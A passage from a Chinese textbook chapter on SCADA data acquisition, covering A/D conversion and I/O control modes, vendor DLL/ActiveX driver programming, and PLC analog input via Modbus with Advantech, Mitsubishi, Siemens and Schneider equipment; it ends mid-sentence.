1.基于嵌入式装置的数据采集 这里嵌入式装置可以是单片机、ARM或DSP等微处理器。以这些微处理器为核心,配备相关的I/O接口、通信接口等,构成智能数据采集装置。 为了实现监控功能,常采用PC作为监控主机,由带有微处理器的装置做下位机,完成数据采集功能。由于这种智能装置上存储空间有限,因此,这些数据要及时送入PC中。在一般的数据采集系统中,如采集温度、压力等慢变信号,通常不采用这种方式。这种装置主要用于高速数据采集系统。如旋转机械设备状态监测时,要采集机械振动信号,这时普通的采集设备不一定能满足要求。由于普通单片机数字信号处理能力较弱,多数高速数据采集设备都采用专用数字信号处理器(DSP)作为快速采集板的CPU,它与PC在功能上采用主从方式,由PC负责启动或中止从机,并设定从机启动时的初始值,如采样速率、通道选择、报警参数等。同时,DSP与PC在结构上采用并行处理、独立运行方式,采用存储器共享技术,由双端口RAM或其他方式实现双机高速通信。 DSP技术的引入不仅可以实现高速数据采集,而且能够充分发挥其实时信号处理的优势,使监控系统的性能极大程度得到改善。快速数据采集板虽可采用市场上出售的现成的开发板,但这种板的硬件结构较复杂,要想利用它来开发高速数据采集系统,首先要了解DSP芯片及其相关电路的硬件工作原理,然后要熟悉大量的DSP汇编指令,再根据需求进行软件编程及调试,难度较大,需要较多的时间来完成此项工作。 2.网络化数据采集 该方案与基于DSP的数据采集系统不同,网络化数据采集设备带有各种通信接口。根据对采样速度的不同要求可以分为高速采集模块和低速采集模块。数据采集模块可以放置在工业现场。如英国输力强公司于20世纪90年代推出的在线实时监测及联网监测管理系统。其数据采集模块包括IMP和VIMP两类。IMP和VIMP分别用于工艺量数据及振动量数据的采集,此种模式采用S网络(一种具有自定义网络协议的网络)进行数据通信,在诊断中心与各监测点之间建立起信息高速公路,将各监测点的数据实时地送往诊断中心,由诊断中心进行数据管理、频谱分析和数据处理。一般来说,VIMP模块适用于现场环境比较恶劣的场合,它将模拟量转换成数字量传输,因而抗干扰性能好。由于VIMP系统的技术比较成熟,国内有不少大中型企业都采用这种系统,因此这种方案实施起来比较容易。但是VIMP系统的通信网络为S网络的串行通信方式,如果网上带有多个VIMP采集站,由于传输速率的限制,数据采样间隔就比较长,不能满足状态监测与故障诊断算法对数据的要求。 近年来,基于RS-485总线的各种数据采集模块大量涌现,中国台湾研华科技、泓格科技等公司有种类比较齐全的各种I/O、通信及辅助模块,可以方便构成分布式数据采集系统。为了方便客户在不同的开发环境下开发应用程序,他们提供了多种形式的驱动程序。 3.基于虚拟仪器技术的数据采集 虚拟仪器指的是具有虚拟仪器面板的个人计算机仪器。虚拟仪器由计算机、仪器模块和软件三部分组成。仪器模块部分的数据采集卡、GPIB卡等仅用于信号的输入/输出,仪器的功能主要由软件实现。操作人员通过友好的图形用户界面以及面向虚拟仪器的编程语言来控制仪器的运行,以完成对被测试量的采集、分析、判断、显示、存储以及数据生成。虚拟仪器强调软、硬件的可重用性,强调软件在仪器中的作用。 虽然虚拟仪器的概念主要是针对各种仪器开发,但是随着虚拟仪器产品的不断丰富和其理念的深入,该项技术也被推广到各种测控应用系统中,即采用该项技术开发各种数据采集系统。用虚拟仪器技术设计数据采集系统的好处主要体现在以下几方面: (1)设计灵活—现有丰富的虚拟仪器软、硬件产品能满足各种设计要求。 (2)系统可靠性和稳定性高—由于直接采用可靠的软、硬件设计数据采集系统,与采用单片机的数采系统相比,系统不仅集成度高,可靠性与稳定性也大大提高。 (3)开发周期短—在基于虚拟仪器的数据采集系统中,各种I/O卡件可以插入PC中,然后利用硬件厂家提供的驱动程序,结合虚拟仪器开发软件来编写数据采集程序。由于PC中的插槽数量有限,因此,这种数据采集方式只适合较小规模的监控系统。 基于虚拟仪器的数据采集详见本书3.6节。 3.3.2 数据采集中的I/O控制方式 数据采集就是在CPU的控制下将I/O卡的输入、输出数据作转换,把计算机内存中的数据输出,或将外部的模拟数据转换为数字量后再送入内存。这里主要讨论基于板卡的数据采集中I/O控制方式。要实现对信号的采集,必须掌握数据采集的基本原理和实现技术。通常,数据采集软件的编写主要是对各种数据采集卡(A/D转换器)进行的。在数据采集系统开发前,首先要对卡件进行各种软、硬件设置,如通道地址、占用的系统资源、通道增益、通道选择等,而这些都是通过对采集卡中相关的寄存器设置实现的。这些设置有些是通过硬件方式进行,有些可以动态改变,即通过软件进行设置。虽然在实际的各种应用中,信号种类千差万别,可供选择的板卡也很多,但就原理来说,这些设置却是大同小异。 根据采样定理,如果信号的截止频率很高时,采样频率必须相应提高,才能保证频率不失真,而采样频率的最大值是由A/D转换器的转换时间决定的。通常每个数据采集卡都有它固定的转换频率,若要进行振动量等高速数据采集,就要选择转换率高的卡件。 在进行数据采集程序设计前,首先要选择合适的A/D卡,由于计算机总线的不同,一定要选择自己的计算机或数据采集主机所支持的卡件。目前多数计算机都是PCI总线,部分工控机还支持ISA卡件。ISA总线的数据采集卡与PCI总线的不同,在使用上有较大差别。但从数据采集原理上两者是相通的。图3.6所示为A/D转换的详细过程,这里一共包括7个环节。 1)信号源控制 即根据传感器的类型和信号等级,选择合适的A/D采集卡件。如果信号不规范且干扰多,建议将传感器的输出信号接入调理卡,然后用电缆将调理卡与A/D卡连接。 2)A/D转换触发源控制 这里的触发源可以是以下信号: · 计算机软件触发:由PC的CPU发出指令启动A/D转换,通过向启动A/D转换的端口地址写某个整数即可启动A/D转换器开始转换; · 外部模拟量触发:当外部某模拟量数值超过一定数值时,触发A/D转换; · 外部开关量:当外部某开关信号有效时,触发A/D转换; · 定时器、计数器触发:将定时器或计数器的输出与A/D转换器的启动信号相连,它们产生的输出脉冲信号启动A/D转换。 图3.6 A/D转换过程 在一般的数据采集中,多采用软件触发,即数据采集程序中通过软件来触发A/D转换。典型的就是通过软定时器来启动数据采集。但是在一些特殊场合,数据采集必须由特定的信号来触发,如在某些旋转机械状态监测中,对于振动信号的采集要由转速传感器来的键相信号控制;在定时数据采集中,A/D转换信号要由定时器来触发。 并非所有的数据采集卡都支持上述的外部触发,因此,若对A/D触发有特殊要求,一定要看清楚说明书。 3)A/D数据缓冲 对于高速数据采集,当A/D转换启动后,会产生大量的数据,这些数据必须暂时存储在板卡上的FIFO中,否则,若PC来不及将转换后的数据送入计算机内存,这些数据会被后转换来的数据覆盖。 4)数据传输 数据传输就是如何将A/D转换后的数据送入计算机的内存中,然后被计算机加工、处理和存储。A/D转换后的数据通常保存在板卡的寄存器或FIFO中,这些数据必须及时取出。数据传输主要有3种方式: (1)查询管理—所有的数据采集卡的寄存器中都有一定的位信号ECO(End of Conversion,转换结束),该信号反映了A/D转换的状态。如ECO=1,表示转换仍在进行;如ECO=0,则表示A/D转换已结束。所谓查询管理,即通过程序读该位的状态来对A/D转换的数据进行管理,如ECO=1则等待并继续查询;如ECO=0则表示转换已完成,可以读取A/D转换结果。 (2)中断管理—把A/D转换芯片的状态线STS与中断请求线相连,用做中断管理,只要A/D转换完毕,A/D芯片的STS线即发出中断申请,进入中断服务子程序,完成转换数据的读取、处理等。 采取中断管理可以显著提高系统的实时性,使系统有足够的时间响应其他的任务请求。所谓实时性是指要求计算机在规定的时间范围内完成规定的任务。采取中断管理方式,在外围设备没有做好数据交换准备时,CPU可以运行与数据交换无关的其他任务,一旦外围设备做好了数据交换的准备,主动向CPU发出中断请求,只要条件合适,CPU就会中断正在进行的工作,转入数据交换的中断服务程序。完成了中断服务程序后,CPU又自动返回执行原来的任务。通过这种方式,就可以比较好地解决外围慢速设备与CPU高速运行的矛盾,也使系统有更好的实时性。 (3)DMA管理—把A/D转换的结束信号ECO与DMA的请求信号DREQ相连,当A/D转换结束后,ECO信号产生向DMA的请求信号DREQ,由DMA控制将A/D转换的数据传输到内存单元。这种方式实际上是计算机的内存RAM与高速外围设备之间的直接数据交换,数据不必再经过CPU,而是在DMA控制器的控制下,在内存与高速外围设备之间进行的高速、大量的数据交换。这种数据交换方式主要用于一些计算机测控系统中,而计算机监控系统中较少采取这种方式。 A/D的启动方式和管理方式的不同组合,可以获得不同的数据采集方法,一般的组合如下: (1)软件启动,查询管理—这种方式在编程的实现上极为简单,但是程序可移植性差,采样频率对机器速度的依赖性强,在一台计算机上调整好的频率参数,移植到另一台速度不同的计算机上,其决定采样频率的参数需要重新调整。 (2)定时启动,中断管理—这种方式从根本上克服了上一种方式的缺点,实现了采样频率的精确设定,程序对计算机的依赖性大大减少。但这种方式编程复杂,数据采集终端程序如果写的不好,会影响系统的稳定性。 (3)定时启动,DMA管理—这种方式在传输数据时完全由硬件电路实现,可以实现更高的采样速度,更少的占用系统资源,适用于高速数据采集的场合。 当然,不同的应用还可以有其他的组合。 5)中断信号控制 这里主要指的是在A/D转换完成后,如采用中断方式传输数据时的中断信号管理与控制,在前面已有说明。 6)A/D分辨率与数码格式 现在的数采卡A/D分辨率越来越高,选择什么样的分辨率依需要而定,虽然选择高分辨率的卡可以提高测量精度,但其价格相对昂贵,且会造成系统在数据传输和存储上负荷增加。 7)通道隔离与非隔离 通道隔离与非隔离也是与应用要求和现场信号条件有关。有些板卡做到信号成组隔离,有些可以有每个通道隔离。隔离要求越高,信号采集质量可以提高,但成本也越高。 3.4 基于PC的数据采集系统编程 这里所谓的基于PC(个人计算机)的数据采集,是指PC控制数据采集的过程,数据采集的I/O接口设备可以是集中式的数据采集板卡,也可以是分布式的数据采集模块,这些模块之间可以采用厂家自定义的通信协议,也可以采用现场总线协议。利用PC机中的串口或安装的通信通信卡件实现数据采集设备与计算机的硬件接口。然后在PC中,编写数据采集软件,完成数据采集功能。在此基础上,还可以增加数据记录、控制、报警、报表等功能,构成以计算机为核心的数据采集系统。显然,在这类系统中,数据采集是核心,即必须首先把数据从输入设备中采集上来,或把控制命令通过输出模块送到执行设备。 至于PC中的数据采集应用软件,可以用高级语言,如VC++,或Visual Basic(由于Visual Basic不支持I/O接口,即不能直接对寄存器读写,因此,若利用它来编写数据采集程序,必须要通过DLL等方式实现)来编写,也可以用组态软件,如组态王来通过组态方式实现,或利用虚拟仪器软件LabView来利用图形化编程语言实现。 正如第1章所述,SCADA系统的数据采集包括以下3个方面的内容: (1)下位机如何实现数据采集,即下位机与I/O设备的数据交换。 (2)上位机如何与下位机进行数据交换。 (3)上位机如何与其他应用系统交换数据。 虽然在不同的应用中,SCADA系统的软、硬件设备会相差很大,但从数据采集方式来讲,基本上不超出图3.7所示的范畴。在图3.7中,硬件可以是I/O设备,也可以是各种智能数据采集装置、数字显示或控制仪表或其他形式的下位机。由于硬件设备的多样性,引起总线类型、通信协议等不同,因此,在硬件接口及软件编程上比较复杂和多样。相比较而言,上位机与下位机以及上位机与其他应用系统的数据交换要简单很多,目前多采用OPC技术进行实时数据交换。对于历史数据交换,多采用开放的数据库接口进行。本节重点介绍下位机系统的数据采集技术与编程,主要包括基于DLL的数据采集、基于ActiveX的数据采集、基于PLC的数据采集(分别与AI数据采集模块与智能仪表配合)。 本节虽然将以泓格科技的分布式数据采集模块为例进行编程介绍,但是这种方式也适用于其他的数据采集设备。因为DDL和ActiveX技术都是微软支持的主流技术,它们在计算机系统中广泛应用,只是在数据采集中,设备是各种I/O设备,而不是计算机系统中的显卡、声卡等设备。 图3.7 SCADA系统中几种不同数据通信方式 3.4.1 基于DLL的数据采集 这是一种常用的针对底层硬件的数据采集程序设计方式,即把各种针对不同硬件的数据采集命令封装成函数并组成DLL文件,以类似API调用方式来进行数据采集,几乎每个硬件厂家都提供这种方式的驱动DLL文件。泓格科技将7K系统数据采集模块的DLL驱动称作DCON_DLL,它可以被VB、VC++和Delphi等调用。下面简单介绍用VB来设计数据采集程序。 首先新建工程(标准EXE),然后添加模块:I7000.bas和7000u.bas。I7000.bas为对VB中要调用的所有DLL进行声明,而I7000u.bas中是大部分的全局变量和错误信息。然后再添加窗体,得到的工程如图3.8所示。该窗体的控件如图3.9所示。该工程可以演示对几种数字量I/O模块进行数据采集。 图3.8 VB数据采集工程窗口 图3.9 VB数据采集窗体 窗口中的控件包括:对模块类型及模块通信参数进行设置的列表框和设置模块地址的文本框;设置校验使能的Radio按钮等。程序的设计如下所示。在程序中调用了函数DigitalIn,该函数的使用方法可参考泓格公司的技术文件DCON_DLL.PDF。 3.4.2 基于ActiveX的数据采集程序设计 在Windows程序设计中,面向对象程序设计是一种重要的设计方法,具有一系列的优点。一些常用的功能被封装成ActiveX控件,只要计算机中安装了该类控件,就可以在程序设计中使用。将这种技术用于数据采集,就是为各种I/O设备开发ActiveX控件,该控件提供了一系列属性和方法供编程人员调用,而编程人员不用关心I/O接口的实现及其细节部分,只要掌握如何使用相关的控件。 泓格将其7K和8K系列数据采集产品的驱动部分封装成DCON_ActiveX,该控件的使用方法可参考其发布的光盘中或网站下载的文件DCON_ActiveX.PDF。这样在进行数据采集程序设计时就可以像其他控件一样使用。这里仍然以数字量I/O采集为例,介绍其VB程序设计。读者可以与3.4.1节的内容比较,发现两者的不同。 首先在系统中安装DCON_ActiveX控件。然后新建工程(标准EXE),查看菜单“工程→部件”,出现如图3.10所示的窗口。选中DCON_X ActiveX Control。单击“确定”按钮退出后可以在VB设计工具条中看到图标 。将该控件拖拉到VB的窗体中,再按照图3.11设计窗体。在图3.11中,可以看到DCON_ActiveX的各种属性。详细的程序代码如下: 图3.10 VB部件窗口 图3.11 用DCON_ActiveX设计数据采集程序 显然,与采用DLL进行数据采集编程相比,采用ActiveX控件设计程序要简单。因为熟悉控件的使用要比熟悉DLL函数声名与调用要简单,在属性窗口设置参数比用代码编程来设置属性也要简单。 3.4.3 PC总线I/O板卡设备数据采集编程 由于PC的软、硬件具有非常好的开放性和统一的标准,大量的工控厂家生产相应的板卡设备和工控机,采用PC总线I/O设备和计算机(工控机)构成小型测控或监控系统是一种常见的解决方案。由于PC总线的发展,相应的板卡设备也在不断的发展,从早期的ISA总线到如今的PCI总线,这些设备都有很好的兼容性,CPU从早期的16位处理器到目前广泛使用的Windows系列、高稳定性的Unix等多种操作系统以及专业数据采集分析系统 LabVIEW 等软件环境。 这里以北京中泰公司的基于PC总线的板卡设备PC-6310为例子,说明其编程方法。PC-6310使用时只需将接口卡插入机内任何一个ISA总线插槽中,卡前端的 40 芯扁平信号电缆从机箱外部直接接入。 PC-6310 模入接口卡允许采用32路单端输入方式或16路双端输入方式。用户可根据需要选择测量单极性信号或双极性信号。同时为方便用户外接放大器的需要,该卡由插头可外供±12V电源,其使用电流最大不得超过200mA,并禁止短路操作。 1.板卡结构与功能 PC6310板卡包括核心器件A/D转换器和其外围设备,如放大器、通道选择开关、译码器、逻辑控制电缆等,如图3.12所示。它们的组成与功能介绍如下。 图3.12 PC6310板卡结构 (1)通道开关—模拟通道开关由4片CD4051及跨接器KJ1、KJ2组成,可以从32路单端信号或16路双端信号中任选一路,送入差分放大器。 (2)通道译码—通道译码电路将由D0~D4共5位数据组成的通道代码译成通道选择控制信号并驱动通道开关。对于单端输入方式,通道代码序号为00H~1FH(0~31),对于双端输入方式,通道代码序号为00H~0FH(0~15)。通道译码电路的端口地址为板卡初始地址+0。 (3)差分放大器—差分放大器由运算放大器以及相关的电阻、电位器、跨接器KJ4组成,改变跨接套的位置可以选择不同的放大增益。电位器W1用于零点调整,W2用于信号满度调整。 (4)A/D转换器—12位逐次逼近式A/D转换器ADS774片内自带精密基准源,并经激光修调,具有较高的转换速率和转换精度,其转换时间仅为10μs。A/D转换器由程序启动,其方式为在初始地址+1的端口地址上任写一数。转换状态可由程序查询读出。A/D转换后的输出代码形式由跨接器KJ3选择,可分别输出二进制原码或双极性偏移二进制码。电位器W3用于满量程增益调节,W4 用于双极性偏移调节。 (5)数据锁存及状态标志—数据锁存电路将A/D转换完成后的结果自动存入数据锁存器,并用高字节的D7位表示A/D转换器的工作状态。当D7=1时,表示A/D正在转换;D7=0时表示转换结束,此时可以读取数据。用户可以通过程序查询D7的状态来判断A/D转换状态,以保证正确读数。本端口地址高字节为初始地址+2,低字节为初始地址+3。 2.板卡地址及其寄存器 I/O基地址的选择是通过开关K1 进行的。开关拨至ON 处为“0”,反之为“1”。I/O基地址的选择范围一般为100H~3F8H之间。用户应根据主机是否插入其他功能卡来决定本卡的I/O基地址。出厂时本卡的基地址设为100H(如图3.13(a)所示),并从基地址开始占用连续4个地址。如对于图3.13(b)所示的设置,其地址为318H。 图3.13 板卡I/O地址选择 各控制端口的地址与功能见表3.1。 表3.1 端口地址与功能表 3.数据采集编程 1)用C语言编写数据采集程序 对通道1连续采样100次,程序启动和查询。使用C语言编程程序如下: 2)用函数调用方式编写数据采集程序 中泰PC-6000 系列驱动程序是为PC-6000 系列多功能工控采集板配制的工作在中、英文Windows 95/98/NT/XP环境下的一组驱动程序,可以方便地使用户在 Windows 环境下检测硬件的工作状态,以及帮助软件开发人员在常用的C/C++, Visual Basic, Delphi, Borland C++ Builder, Borland Pascal for windows 等开发环境中使用 PC-6000 系列工控采集板,进行数据采集和过程控制等工作。驱动程序是一个标准动态链接库 (DLL文件),它的输出函数可以被其他应用程序在运行时直接调用。用户的应用程序可以用任何一种可以使用DLL链接库的编程工具来编写。每种板卡依据其自身功能的不同具有不同的输出函数和参数定义。 在Windows 95/98环境下,使用Microsoft Visual Basic 6.0开发环境,采用调用驱动程序的输出函数的方法循环采集 A/D 的32 个通道。 首先创建一个窗口,名为 Form1。设置一个定时器,名为Timer1;一个Text1;一个Text2数组,Text2[]。在工程的模块中,进行函数申明如下: 函数申明后,在VB的函数中就可以加入以下代码进行数据采集,具体与3.4.1节介绍的内容相似。 3.5 PLC在数据采集系统中的应用 3.5.1 集成PLC与数据采集模块的模拟量数据采集编程 很多小型的数据采集或测控系统常选用PLC做主控制器。特别是如果I/O点以数字量为主,且有一定的逻辑控制或顺序控制。一般来说,小型的PLC主机单元没有模拟量点,如果扩展PLC的模拟量模块,价格会比较贵,而且模块具有的I/O点也不多,且受到扩展模块数量的限制。对于这种既想利用PLC作为主要的测控设备来处理逻辑控制功能,又要控制系统硬件成本的系统来说,可以采取PLC与模拟量数据采集模块结合的方式来开发测控系统。这些模拟量模块通常通道数多,种类较多,平均每个通道的界个价格比PLC扩展模拟量模块便宜。 在这样的应用中,PLC可以选配串行通信接口模块,将该模块的通信接口和模拟量数据采集模块进行连接,而模拟量的输入通道可以与外部的传感器连接,输出通道可以与外部的执行器连接。注意正确设置外接的数据采集模块的通信参数,特别是总线地址。通信协议可以是标准Modbus/RTU协议、简单方便的ASCII协议或设备厂家自定义的协议。只需要编写PLC与模块的通信程序,将模拟量数据采集模块和PLC无缝连接,实现模拟量的低成本采集。 采用这种方式的另外一个优点是对于模拟量数据采集,可以把模块放到现场传感器或执行器附近,构成分布式数据采集,从而节约大量的屏蔽电缆,降低系统成本,而且维护起来也方便。不过,由于位移现场的这些数据采集模块都要依靠外部供电,因此,要增加电源电缆的消耗。当然,也可以利用PLC厂家的远程I/O模块构成分布式数据采集系统,只是其成本要比这里介绍的稍高。 研华公司生产的ADAM-4100强固型模块,具有8路模拟量采集,16bit分辨率,采集精度可达到±0.1%或更高。它专为恶劣环境下的可靠操作而设计,能够在宽温度工作范围、宽电源输入范围、甚至在强噪声干扰环境中工作。此外,特别设计的自动滤波器功能,可根据噪声的最大频率来自动调整滤波参数,进而保证信号采集的准确和稳定。通常而言,普通的PLC模拟量扩展模块,达不到这么高的性能指标。 研华公司生产的带Modbus协议的ADAM强固型RS-485 接口I/O模块ADAM-4100系列及其功能如表3.2所示。 表3.2 ADAM-4100 强固型模块 目前ADAM强固型模块可以和以下的PLC进行通信,进行模拟量数据采集。其具体配置为: (1)三菱FX2N CPU单元与FX2NC-485ADP通信适配器。 (2)西门子S7 CPU224/226。 除了研华数据采集模块外,主流的PLC(如三菱电机、欧姆龙、西门子等)还可以与台湾鸿格科技等厂家的数据采集模块联合使用,其方法与本节介绍的类似。 需要说明的是,由于PLC与数据采集模块是通过串行通信进行数据采集的,因此,数据采集的周期受到通信速率的限制,不可能实现高速的数据采集。而PLC与其自身的扩展模块连接时,它们的连接属于PLC的内部总线,通信速率要远远高于串行通信,因此,对于模拟量的读、写,速度可以很快,部分能实现较高速的数据采集。 这里以西门子S7 CPU224/226与研华模块配接为例来详细说明其编程,对相关的指令与应用做简单介绍。需要把PLC的通信接口与数据采集模块的通信端口连接。此外,数据采集模块需要单独供电。如果有超过一个数据采集模块,则需要利用模块厂家提供的工具软件,把模块的地址设置为不同的数值,串行通信参数一致。否则,PLC与数据采集模块的通信可能会异常。 1. 模块设置(以电压电流采集模块ADAM-4117为例) 利用研华的工具软件ADAM.net Utility,将ADAM-4117的通信协议设置为Modbus协议。ADAM-4117信号采集的Modbus地址如表3.3所示。 表3.3 ADAM-4117强固型模块 续表 2. S7-200 Modbus主站协议编程 STEP7-Micro/WIN编程软件指令库包含有专门为Modbus通信设计的预组态的子程序和中断服务程序,使得与Modbus主站和从站设备进行通信简单易行。Modbus从站指令可以将S7-200组态为Modbus RTU从站设备,与Modbus主站设备进行通信。Modbus主站指令可以将S7-200组态为Modbus RTU主站设备,与一个或多个Modbus从站设备进行通信。Modbus指令安装在STEP 7-Micro/WIN指令树的库文件夹中,这些指令使S7-200可以作为Modbus设备。 将PLC S7-200和ADAM-4117连接,在PLC中编程,即可将ADAM-4117的第0通道(Modbus地址为40001)的值读出,具体程序如图3.14所示。 图3.14 S7-200PLC中MODBUS编程 3.5.2 用PLC与智能仪表配合进行数据采集编程 随着通信技术和嵌入式软、硬件技术的发展,智能仪表的性能已经有了很大的提升,多数智能仪表都具有比较先进的控制算法,并具有较强的通信能力,可以较容易地通过RS-485接口或其他通信接口将智能仪表组成集散控制系统。在中、小型的过程控制系统中,智能仪表是一类广泛使用的控制装置。然而,智能仪表本身并不善于处理数字量信号和逻辑控制,因此,在测控点数较少但I/O种类较多的系统中,可以将PLC与智能仪表结合起来使用,这样可以建立具有较高性价比的测控系统。特别是要求现场有仪表显示的情况下,这种方式更加合理有效。 图3.15给出了一种典型的智能仪表与PLC结合进行过程测控的系统结构。根据系统数字量信号的多少及对数字输出的要求,可以确定PLC的配置,模拟量的数据显示和采集可以通过智能控制(或显示)仪表来实现,这样可以构建一个基于PLC和上位机的两级测控系统,PLC主要进行逻辑控制和与上位机通信,智能仪表可以完成模拟量的显示和控制。以三菱FX2N系列小型PLC和宇电AI-501数字显示仪表为例加以说明,显示仪表与检测仪表配接可以显示温度、压力、流量和液位等信号。本系统中假设有4台仪表,仪表地址设置为0~3。这样设计的系统还有一个好处是显示仪表显示的数值与PC上的完全一致,因为计算机中显示的数值就是从显示仪表中采集来的。而且这种方式还节省了购买PLC的A/D模块的费用。如果不采取这种方式,而是将检测仪表的输出信号分两路显示,一路进PLC 的A/D模块通道,一路进显示或控制仪表,而进入计算机中的数值是从PLC中取出,通常情况下,计算机中显示数值与仪表显示数值是有偏差的,这样容易造成操作人员对数据采集的结果有怀疑,他们会问到底哪个是准确的。 图3.15 智能仪表与PLC结合进行过程测控的系统结构 在这样的系统中PLC需配置FX2N-485-BD串行通信扩展模块,且PLC与该模块的硬接线要正确。为了实现PLC与显示仪表的通信,需要根据显示仪表的通信协议来编程。本节介绍的显示仪表其通信协议见本书2.3.5节。具体编程说明如下。 FX2N利用RS指令实现串行通信,数据的传送格式可以通过特殊寄存器D8120来设置。本系统中通信参数是:波特率9.6kbps、无奇偶效验、8个数据位、2个停止位。根据该参数,设置D8120为H0C89,即用二进制表示为110010001001。最后一位B0位“1”表示8个数据位;B1和B2表示校验形式,这里“00”表示无奇偶效验;B3为“1”表示2个停止位;B4~B7表示通信速率,这里的“1000”表示波特率为9600bps;B8表示起始符,B9停止符,这里设为“00”是因为三菱电机RS指令规定采用上述的使用方式时必须这样设置;B10和B11表示通信模式,这里设置为“11”表示采用RS-485接口通信,且采取调制解调器模式工作。在PLC投入运行时将H0C89写入D8120寄存器,同时把仪表地址、要读写的参数代号、CRC校验等也写入从D100开始的数据寄存器中,相应的梯形图程序如图3.16所示。 图3.16 设置通信初始化参数 通信参数设置好后,就要利用RS指令进行通信,其梯形图程序如图3.17所示。分别与从地址为0的仪表开始,到地址为3的仪表进行通信。这里M8012的时钟通信周期是100ms。RS指令中的D100表示发送数据的地址,该地址保存初始化时设置的参数。K8表示共有8个字节。而D300表示接收数据地址,而K18表示返回的数据字节数。返回的数据包括测量值、给定值、输出值、报警状态、所读/写参数值以及CRC校验码等。 在接收等待状态或接收完成状态时,要对M8122置位,发送结束时M8122自动复位。当然,在本程序中,当M8012变为ON状态时,PLC也进入接收等待状态。 在通信接收完成标志M8123为ON后,从返回的数据中提取测量值,保存在D330~D333中,然后再对M8123复位。程序如图3.18所示。M8123复位后,PLC通信再次进入接收等待状态。 这里要指出的是,采取通信方式时,PLC从仪表中所读出的测量值是整数,不含有小数点,在计算机上进行显示、存储时,要根据预先设置的仪表小数点位数进行转换。此外,当对采样速率和采样精度要求较高时,受到显示仪表采样速率、精度和通信速率限制,这种方法可能满足不了实时性和精度要求。 图3.17 PLC与仪表通信程序 图3.18 对返回数据进行处理程序 3.5.3 用PLC进行数据采集编程 在各种类型的SCADA系统中,PLC是应用最多的下位机设备。在基于PLC的数据采集和控制中,数字量的输入和输出编程十分方便,通常只需要进行地址定义就可以了,相对而言,模拟量采集稍微复杂一点。这里对三菱电机Q系列、西门子S7-300和施耐德Quantum系列模拟量编程做介绍。 1.三菱电机Q系列模模拟量采集 三菱电机Q系列模拟量输入/输出较早先的A系列简单了许多,只要利用厂家提供的模拟量输入模拟配置工具,就可以将A/D转换后的数据存储到设置的寄存器中。具体过程如下: (1)安装模拟量配置工具软件。 (2)在编程环境GX-Develop下启动工具→智能功能模块→Start,出现如图3.19所示的窗口,在此窗口中设置模块的属性,包括选择模块类型、模块名称及该模块占用的PLC地址(Start I/O)。 图3.19 对返回数据进行处理(1) (3)单击图3.19所示窗口中的“Initial setting”按扭,出现如图3.20所示的窗口,在此窗口中设置每个通道的采样参数,包括通道使能、采样值是按照采样数量滤波还是取一段时间的数据滤波作为测量值等。 图3.20 对返回数据进行处理(2) (4)单击图3.19所示窗口中的“Auto refresh”按钮,出现如图3.21所示的窗口,在此窗口中设置A/D模块每个通道转换后数据的寄存器地址。若需要,还可以设置最大值、最小值寄存器。 图3.21 对返回数据进行处理(3) (5)设置完成,可以进行在线调试,看数据是否正确,若正确,在PLC程序中就可以直接使用这些保存A/D转换后数据的寄存器了。 2.西门子S7-300/400模拟量采集 西门子S7-300/400模拟量编程与三菱电机Q系列相比,稍显复杂。首先要在硬件组态中添加相应的模块,然后选中相应的模块,本例中假设PLC系统中选用了型号为6E17431-KF00-0AB0的8路13位A/D模块,如图3.22所示。然后单击右键,弹出如图3.23所示的模块属性设置窗口,在该窗口可以看到模块的一般属性。先单击“Addresses”按钮,可以设置该模块的起始地址,以及相关联的组织块映像。 再单击“Inputs”按钮,窗口变换为如图3.24所示。在该窗口中可以设置模块的每个通道属性,如通道是否激活、通道信号类型(电流、电压、电阻等),对部分类型的信号,还可以设置信号的范围。 图3.22 西门子PLC工程硬件组态窗口 图3.23 西门子A/D模块地址属性设置窗口 图3.24 西门子A/D模块输入属性设置窗口 此外,还可以在硬件组态中设置编辑地址符号(Edit Symbols),这个操作也可以在变量表中进行。进行这样的设置后,就可以在编程时直接使用变量。 这些设置完成后,如果硬件接线正确,就可以实现相应通道的模拟量采集。当然,为了使用方便,通常还利用FC105标度变换函数将相应数字量转换为实际的工程量,程序如图3.25所示。 图3.25 西门子A/D模块数据采集编程 3.施耐德Quantum模拟量采集 用施耐德编程软件Unity Pro首先进行硬件配置,本例中假设选用了一块型号为XL140-ACI-03-00的8路模拟量输入模块,该模块被配置在Slot8中。实际使用了3路信号,这3路信号与3台具有4~20mA电流输出信号的仪表连接。程序如图3.26所示。采样周期为1s,由定时器实现。在编程中,要调用系统提供的函数,最终把3个通道的模拟量转换为工程量,存储到AI1、AI2和AI3这3个变量中,数值范围为0~4000。 图3.26 施耐德QuantumA/D模块数据采集编程 3.6 基于虚拟仪器的数据采集技术 3.6.1 虚拟仪器技术 虚拟仪器利用计算机强大软、硬件资源,并根据用户需求定义和设计自己的仪器系统,以满足所需的测试功能。由于计算机系统有强大的数据处理能力,因此虚拟仪器系统能容易地完成对仪器的数据采集、控制、分析、存储、结果显示与输出等,并可以完成一些高级的自诊断功能。同时可视化软件开发系统的出现,又使得可以建立友好生动的虚拟仪器面板,而集成在虚拟仪器软件中的在线帮助功能又能对操作者提供及时的帮助和指导,因此虚拟仪器的操作使用十分容易。虚拟仪器可代替传统仪器,改变传统仪器的使用方式,提高仪器的功能和使用效率,改善仪器的性能价格比,使用户可以根据自己的需要灵活地组态和配置自己的仪器系统和功能。由于虚拟仪器的功能主要通过软件来实现,因此虚拟仪器的功能可以做到模块化,易于扩展、升级和维护。虚拟仪器可在相同的硬件系统上,通过不同的软件配置实现功能完全不同的各种测量仪器,即软件系统是虚拟仪器的核心,软件可以定义各种仪器,因此可以说“软件即仪器”(The software is the instrument)。和其他的测量仪器一样,虚拟仪器在功能上主要由数据采集与控制、数据测试与分析、结果显示与输出这3部分组成,但可以具体细分为以下几点: (1)系统配置与初始化。 (2)数据采集与控制:具有设置A/D采样时间、同步、预触发等复杂功能。 (3)数据分析与处理:包括时域分析与频域分析等功能,如频谱分析、相关(自相关、互相关)分析、统计分析等功能。 (4)数据存储与管理。 (5)分析结果显示与输出。 (6)网络功能。 (7)在线帮助功能:虚拟仪器不仅具有良好的人机界面,更重要的是它还具有生动的人机交互功能。虚拟仪器操作人员随时可以获得相关的操作帮助、系统信息提示等。随着多媒体技术的发展,虚拟仪器系统可以做到更加人性化。 从上述虚拟仪器的介绍可以看出,虚拟仪器中的数据采集是虚拟仪器功能发挥的基础。在SCADA系统开发时,也可以借鉴其中的技术和方法。 3.6.2 虚拟仪器软件开发平台 1.虚拟仪器应用软件开发工具 对于虚拟仪器应用软件的编写,大致可分为以下两种方式: (1)用通用编程语言进行编写。主要有Microsoft公司的Visual 